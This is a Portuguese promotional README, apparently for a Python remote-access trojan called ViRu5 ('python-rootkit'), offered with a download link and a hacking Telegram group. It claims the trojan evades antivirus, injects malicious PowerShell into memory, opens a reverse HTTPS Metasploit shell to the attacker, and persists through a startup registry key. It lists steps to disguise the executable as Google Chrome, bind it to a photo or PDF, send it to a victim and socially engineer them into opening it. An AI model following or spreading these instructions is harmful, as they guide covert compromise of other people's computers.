python-rootkit

Este é um RAT python indetectável completo que pode ignorar quase todos os antivírus e abrir um backdoor dentro de qualquer máquina Windows que estabelecerá uma conexão https Metasploit reversa com a sua máquina de escuta.

Ciclo de vida do ViRu5

  • Ignore todos os antivírus.
  • Injete um script malicius powershell na memória.
  • Estabeleça uma conexão https reversa com a máquina invasora.
  • Verifique a cada 10 segundos e verifique se a conexão ainda existe. Caso contrário, restabelecerá uma nova conexão.
  • Adicione uma chave de registro de inicialização para se reconectar ao invasor após a reinicialização.

Passos

  • Atualize os parâmetros viRu5 / source.py com seu lhost e lport
  • Altere o nome source.py para GoogleChromeAutoLaunch.py
  • Adicione GoogleChromeAutoLaunch.py, setup.py e seu ícone como icon.ico ao diretório c: \ python27
  • Do cmd docd c: \ p ython27 python setup.py py2exe
  • Encontre o arquivo exe do RAT no diretório Dist.
  • Cegue-o com qualquer foto, pdf, palavra ou qualquer tipo de arquivo
  • Envie para a vítima
  • Use suas habilidades de engenheiro social para fazê-lo abrir o arquivo
  • Você receberá uma conexão reversa https metasoplit 🙂

Testando em

  • Windows 7 32bit
  • Winodws 7 64bit
  • Widowns 8 32bit
  • Windows 8 64bit
  • Windows 8.1 32bit
  • Windows 8.1 de 64 bits
  • Windows 10 32bit
  • Windows 10 64bit
Download
Hacking Grupo Telegram